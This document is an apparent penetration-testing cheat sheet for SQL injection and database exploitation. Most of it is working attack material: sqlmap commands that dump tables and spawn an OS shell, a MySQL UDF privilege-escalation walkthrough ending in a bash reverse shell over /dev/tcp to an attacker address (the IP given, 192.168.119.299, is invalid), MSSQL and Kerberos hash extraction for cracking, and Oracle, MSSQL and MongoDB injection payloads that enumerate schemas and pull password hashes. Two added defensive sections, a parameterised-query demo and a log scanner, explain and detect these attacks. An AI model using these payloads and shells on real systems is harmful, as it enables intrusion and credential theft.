All commands listed here assume you have a command prompt…
All listed items are separate commands unless otherwise specified…

RESOURCES TO USE DURING TESTING

this is an MSSQL Practical Injection cheat sheet
this is another SQL injection sheet
this is a list of escape characters
…there are plenty more online

CONNECT TO SQL SERVER

sqsh -S <IP> -U <Username> -P <Password> -D <Database>
# NO SPACE BETWEEN -p AND THE PASSWORD: "-p password" PROMPTS FOR THE PASSWORD AND TREATS "password" AS THE DATABASE NAME
mysql -u user -ppassword
mysql -u user -ppassword -h host

QUICKLY SAVE A QUERY THROUGH BURPSUITE

…NOTE… this is not usable on an OSCP exam

http://ip.com/whatever.php?id=1

INTERCEPT WITH BURP - NO FORWARD
RIGHT CLICK AND HIT 'SAVE ITEM'

USE SQLMAP WITH SAVED ITEM
sqlmap -r <file> --banner (takes a while to run)
sqlmap -r <file> --users
sqlmap -r <file> --is-dba
sqlmap -r <file> --dbs
sqlmap -r <file> -D <db> --tables --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --hex --threads=10 (sometimes it shows more)
sqlmap -r <file> -D <db> -T <table> --columns --dump --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --dump --force-pivoting --threads=10

RUN FOR ALL TABLES AND COLUMNS
sqlmap -r <file> -D ecomerce -T user --columns --dump --force-pivoting --threads=10

TRY A SYSTEM SHELL
sqlmap -r mssql --os-shell --threads 10
os-shell> whoami

MYSQL ENUMERATION

…requires credentials

mysql --host=127.0.0.1 --port=13306 --user=wp -p
MariaDB [(none)]> SHOW Grants;
MariaDB [(none)]> show variables;

MYSQL EXPLOIT

… creates a function within mysql, then executes a command as root

# GRAB THE EXPLOIT TO COMPILE
git clone https://github.com/1N3/PrivEsc.git
gcc -m32 -g -c raptor_udf2.c
gcc -m32 -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
ls
lib_mysqludf_sys_0.0.3.tar.gz  raptor_udf2.c  raptor_udf2.o  raptor_udf2.so  raptor_udf.c

# ON TARGET MAKE A DIRECTORY /tmp/tmp
mkdir /tmp/tmp
cd /tmp/tmp
wget http://192.168.119.299:443/raptor_udf2.so
cp raptor_udf2.so raptor.so

mysql> create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)

mysql> insert into foo values(load_file('/tmp/tmp/raptor.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/raptor.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'raptor.so';
Query OK, 0 rows affected, 1 warning (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+-----------+----------+
| name      | ret | dl        | type     |
+-----------+-----+-----------+----------+
| do_system |   2 | raptor.so | function |
+-----------+-----+-----------+----------+
1 row in set (0.00 sec)

mysql> select do_system('bash -i >& /dev/tcp/192.168.119.299/80 0>&1');

CREDENTIAL LOCATIONS

… may be able to find files with credentials
… here are a couple of common ones

# PLAIN TEXT DIRECTORY STRUCTURE
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Template Data\master.mdf

# OLDER NT DIRECTORY STRUCTURE
C:\PROGRA~1\MICROS~2\MSSQL1~1.SQL\MSSQL\Binn\Templates\master.mdf

# SAME OLDER STRUCTURE
PROGRA~1\MICROS~2\MSSQL1~1.SQL\MSSQL\Binn\Templates\master.mdf

# POWERSHELL - RETRIEVE HASHES
Add-Type -Path 'OrcaMDF.RawCore.dll'
Add-Type -Path 'OrcaMDF.Framework.dll'
Import-Module .\Get-MDFHashes.ps1
Get-MDFHashes -mdf "C:\Users\admin\Desktop\master.mdf"
# IF THE FILE IS IN USE, ONLY BACKUPS CAN BE USED FOR THIS

# HASHCAT MODULE
-m 1731

# CREATE HASHCAT READABLE HASH
Invoke-Kerberoast -outputformat hashcat | fl
hashcat -m 13100

SQL INJECTION QUERIES

… these are just a few common ones
here and here and here are more (just google it)

# HAD TO FIND THE NUMBER OF COLUMNS
# FIND WHICH COULD BE USED FOR INJECTION

# ORACLE
# VERSION
admin' or 1=1 union select (select banner from v$version where rownum=1),null,null from dual--
# DB NAME
admin' or 1=1 union select global_name,null,null from global_name--
# TABLE NAME
admin' or 1=1 union select table_name,null,null from all_tables--
# COLUMNS
admin' or 1=1 union select column_name,null,null from all_tab_columns where table_name='user_table'--
# LOOT
admin' or 1=1 union SELECT username FROM all_users--
admin' or 1=1 union SELECT username,null,null FROM all_users--
admin' or 1=1 union SELECT name FROM sys.user$--
admin' or 1=1 union SELECT column_name FROM all_tab_columns WHERE table_name = WEB_ADMINS--
admin' or 1=1 union SELECT column_name,null,null FROM all_tab_columns WHERE table_name = 'WEB_ADMINS'--
admin' or 1=1 union SELECT PASSWORD,null,null FROM WEB_ADMINS--
# USED TWO COLUMNS TO SEE USER / HASH
admin' or 1=1 union SELECT PASSWORD,ADMIN_NAME,null FROM WEB_ADMINS--

# MSSQL (RIDICULOUS!)
# syntax is [server].[database].[schema].[table]
',convert(int,db_name(6))--
',convert(int,(select+top+1+table_name+from+archive.information_schema.tables)))--
',convert(int,(select+top+1+username+from+users)))--
',convert(int,(SELECT TOP 1 COLUMN_NAME FROM archive.information_schema.columns)))--
',CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 alogin FROM (SELECT top 1 alogin FROM archive..pmanager ORDER BY alogin ASC) sq ORDER BY alogin DESC)+CHAR(58)+CHAR(58))))--

# MONGODB
condition=aaa';shellcode=unescape...
db.my_collection.find({'$where':'shellcode=unescape....
# THIS GOT RIDICULOUS... NEED TO LEARN MORE
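Why the Oracle-style `admin' or 1=1 union SELECT ...--` payloads above work, and what stops them, as an added example that is not from the original cheat sheet: a Python/sqlite3 stand-in (constructed tables `users` and `web_admins`, names assumed) runs the same string through string-concatenated SQL and then through a parameterised query.

```python
import sqlite3

# Constructed stand-in for the application's database (assumption: sqlite3 is
# used only so the example runs offline; the injection mechanics are the same).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(username TEXT, role TEXT);
        INSERT INTO users VALUES ('admin', 'admin'), ('cwh', 'user');
        CREATE TABLE web_admins(admin_name TEXT, password TEXT);
        INSERT INTO web_admins VALUES ('root', 'hash-of-root');
    """)
    return con

def lookup_unsafe(con, username):
    # Vulnerable: the value is spliced into the SQL text, so a quote closes the
    # literal and everything after it is parsed as SQL (UNION, comment and all).
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return con.execute(sql).fetchall()

def lookup_safe(con, username):
    # Hardened: the value travels as a bound parameter and is compared as data;
    # the tautology and the UNION are just characters of a username that does not exist.
    sql = "SELECT username, role FROM users WHERE username = ?"
    return con.execute(sql, (username,)).fetchall()

# The "USED TWO COLUMNS TO SEE USER / HASH" payload from the cheat sheet, with the
# column count matched to the two-column SELECT above.
PAYLOAD = "admin' or 1=1 union SELECT password, admin_name FROM web_admins--"

if __name__ == "__main__":
    con = make_db()
    print("unsafe:", lookup_unsafe(con, PAYLOAD))   # every user plus the web_admins hash
    print("safe:  ", lookup_safe(con, PAYLOAD))     # [] - no such username
```

The same fix applies to every query shape on this page: the "number of columns" and "which column is injectable" steps only matter when input reaches the parser as SQL text.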

SQL INJECTION BASIC STRATEGY EXPLAINED

this is the reference for many of the commands below

# THE ',convert(int,( )))-- IS USED AS A CLIPBOARD... PUT INQUIRY INSIDE

# FIND DATABASE NAMES
convert(int,db_name())--

# OBTAIN TABLE NAMES
select+top+1+table_name+from+information_schema.tables
',convert(int,( )))--

# LOOK FOR SECOND TABLE BASED OFF OF PREVIOUS RESULTS
select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads')
',convert(int,( )))--

# AND FOR ANOTHER TABLE BASED OFF OF PREVIOUS RESULTS... TILL THERE ARE NO MORE
select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users')
',convert(int,( )))--
RECORD DELETED = NO MORE DATABASES

# NEXT TARGET COLUMNS
select+top+1+column_name+from+information_schema.columns+where+table_name='users'
',convert(int,( )))--

# SECOND COLUMN OF THE TABLE WE FOUND
select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname')
',convert(int,( )))--

# CONTINUE UNTIL RECORD HAS BEEN DELETED = LAST COLUMN
select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname','upass')
',convert(int,( )))--

# GETTING THE DATA - SAME METHOD USING TABLE AND COLUMN
select+top+1+uname+from+users
',convert(int,( )))--

# SECOND VALUE AND SO ON
select+top+1+uname+from+users+where+uname+not+in+('admin')
',convert(int,( )))--

# THIRD VALUE AND SO ON TILL RECORD DELETED = LAST VALUE
select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')
',convert(int,( )))--
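A defender-side complement to the strategy above and to the sqlmap section, added here and not part of the original cheat sheet: a Python scanner that URL-decodes request paths from combined-format access log lines (constructed sample, addresses and timestamps made up) and flags the payload shapes this page uses (the convert(int,...) clipboard, UNION SELECT, information_schema walks, ' or 1=1, NOT IN enumeration) plus sqlmap's self-identifying User-Agent.

```python
import re
from urllib.parse import unquote_plus

# Request-path signatures taken from the payload shapes on this page. The path is
# URL-decoded first because logs carry '+' for spaces and %27 for quotes.
PATH_SIGNATURES = {
    "error-based convert": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "union-based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema enumeration": re.compile(
        r"information_schema\.(tables|columns)|all_tab(les|_columns)|all_users|v\$version|sys\.user\$", re.I),
    "tautology": re.compile(r"'\s*or\s+1\s*=\s*1", re.I),
    "not-in walk": re.compile(r"\bnot\s+in\s*\(", re.I),
}
UA_SIGNATURE = re.compile(r"sqlmap", re.I)  # sqlmap's default User-Agent names itself

# Combined-format line: ip ident user [time] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def scan_log(text):
    """Return (ip, status, decoded path, [signature names]) for each flagged request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m["path"])
        hits = [name for name, rx in PATH_SIGNATURES.items() if rx.search(decoded)]
        if UA_SIGNATURE.search(m["ua"]):
            hits.append("sqlmap user-agent")
        if hits:
            findings.append((m["ip"], int(m["status"]), decoded, hits))
    return findings

# Constructed sample log: one benign request, two hand-built injection attempts
# (a 500 on the convert() probe is the error-based technique working), one sqlmap run.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /whatever.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /whatever.php?id=1%27,convert(int,(select+top+1+table_name+from+information_schema.tables)))-- HTTP/1.1" 500 233 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /login.php?user=admin%27+or+1%3D1+union+select+username,null,null+from+all_users-- HTTP/1.1" 200 1201 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /whatever.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
"""

if __name__ == "__main__":
    for ip, status, path, hits in scan_log(SAMPLE_LOG):
        print(ip, status, hits, path)
```

A 5xx response to a convert() probe means the database error reached the client, which is exactly what the error-based walk above needs, so those lines rank first; the enumeration itself is a burst of near-identical requests from one source whose NOT IN list grows by one each time.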
